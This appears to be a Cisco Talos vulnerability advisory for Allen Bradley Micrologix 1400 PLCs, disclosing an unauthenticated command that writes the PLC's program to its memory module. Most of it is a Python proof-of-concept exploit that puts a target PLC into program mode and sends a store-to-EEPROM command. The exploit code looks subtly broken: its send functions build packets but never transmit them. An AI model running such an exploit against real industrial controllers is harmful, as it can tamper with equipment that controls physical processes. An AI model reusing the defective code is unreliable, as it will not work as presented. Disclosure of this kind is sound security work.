Talos Vulnerability Report


Allen Bradley Micrologix 1400 Series B Memory Module Store Program File Write Vulnerability

March 28, 2018
CVE Number



An exploitable file write vulnerability exists in the memory module functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a file write resulting in a new program being written to the memory module. An attacker can send an unauthenticated packet to trigger this vulnerability.

Tested Versions

Allen Bradley Micrologix 1400 Series B FRN 21.2 Allen Bradley Micrologix 1400 Series B FRN 21.0 Allen Bradley Micrologix 1400 Series B FRN 15

Product URLs


CVSSv3 Score

3.7 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N


CWE-200: Information Exposure


When a memory module is installed in a Micrologix 1400, it is possible to instruct the PLC to write its program to that module without authentication. A program that is written to the memory module can be used in a few different ways: as just a backup, as the program to load when an error occurs, and as the program to load every time the device powers on. By leveraging unauthenticated file write vulnerabilities and the device crash vulnerability in conjunction with this write, it is possible to change device settings and flash new firmware.

Exploit Proof-of-Concept

Usage: python .py -i [-p ] Where the elements are as follows: - : whatever name you give the script - : ip address of the plc - : EtherNet/IP port (defaults to 44818)

import argparse
import socket
import binascii
import random
import crcmod.predefined

parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ipaddr", help="target ip address", type=str)
parser.add_argument("-p", "--port", help="target port", default=44818, type=int)
args = parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dst = args.ipaddr
port = args.port

def pad_hex(hex_str, size):
    if "0x" in hex_str: hex_str = "".join(hex_str.split("0x"))
    if len(hex_str) != size:
        numzeros = size - len(hex_str)
        zeros = "0"*numzeros
        hex_str = "%s%s" % (zeros, hex_str)
    return hex_str
def get_tns():
    temp_tns = pad_hex(hex(int(random.random()*65535)).replace("0x",""), 4)
    tns = binascii.unhexlify(temp_tns)
    return tns
def build_eth_instruction(instruction_elements, session_handle):
    command_code      = "\x6f\x00"
    status            = "\x00\x00\x00\x00"
    sender_context    = "\x00\x00\x00\x01\x00\x28\x1e\x4d"
    options           = "\x00\x00\x00\x00"
    handle            = "\x00\x00\x00\x00"
    timeout           = "\x00\x00"
    num_items         = "\x02\x00"
    addr_data_type    = "\x00\x00"
    addr_data_length  = "\x00\x00"
    data_data_type    = "\xb2\x00"
    service_code      = "\x4b"
    size_req_path     = "\x02"
    req_path          = "\x20\x67\x24\x01"
    length_req_id     = "\x07"
    cip_vendor_id     = "\x01\x00"
    cip_ser_num       = "\xf2\x0c\x02\x00"
    cmd = instruction_elements['cmd']
    sts = "\x00"
    tns = get_tns()
    fnc = instruction_elements['fnc']
    data = instruction_elements['data']
    pccc_cmd = "%s%s%s%s%s" % (cmd, sts, tns, fnc, data)
    data_data_length = len(service_code) + len(size_req_path) + len(req_path) + len(length_req_id) + len(cip_vendor_id) + len(cip_ser_num) + len(pccc_cmd)
    data_length = "%s\x00" % binascii.unhexlify(hex(data_data_length + 16)[2:]) 
    data_data_length = "%s\x00" % binascii.unhexlify(hex(data_data_length)[2:]) 
    payload = "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" % (command_code, data_length, session_handle, status, sender_context, options, handle, timeout, num_items, addr_data_type, addr_data_length, data_data_type, data_data_length, service_code, size_req_path, req_path, length_req_id, cip_vendor_id, cip_ser_num, pccc_cmd)
    return payload
def send_instruction(instruction_elements, session_handle):
    return_response = ""
    instruction = build_eth_instruction(instruction_elements, session_handle)
    return_response = sock.recv(1024)
    return return_response
def set_cpu_state(state, session_handle):
    payload = ""
    if state == "run": payload = {"cmd":"\x0f","fnc":"\x80","data":"\x06"}
    elif state == "program": payload = {"cmd":"\x0f","fnc":"\x80","data":"\x01"}
    send_instruction(payload, session_handle)
def register_session():
    registersession_data = "\x65\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x28\x1e\x4d\x00\x00\x00\x00\x01\x00\x00\x00"
    reg_session_response = binascii.hexlify(sock.recv(28))
    session_handle = binascii.unhexlify(reg_session_response[8:16])
    return session_handle
session_handle = ""
sock.connect((dst, port))
session_handle = register_session()

set_cpu_state("program", session_handle)

store_to_eeprom = {"cmd":"\x0f","fnc":"\x58","data":"\x01\x00\x00\x00"}
send_instruction(store_to_eeprom, session_handle)



Simply disabling EtherNet/IP on the device through RSLogix will not prevent this attack as it uses a different technique from that used in standard traffic.

While the above technique is used during legitimate operations, this activity should be rare and should not occur without the knowledge of the PLC operators. As such, monitoring of traffic to and from the Micrologix 1400 and other sensitive hosts is recommended. Further, organizations should implement proper network segmentation to help prevent unauthorized users from accessing the PLC.


2017-09-22 - Vendor Disclosure
2018-03-28 - Public Release


Discovered by Jared Rittle and Patrick DeSantis of Cisco Talos.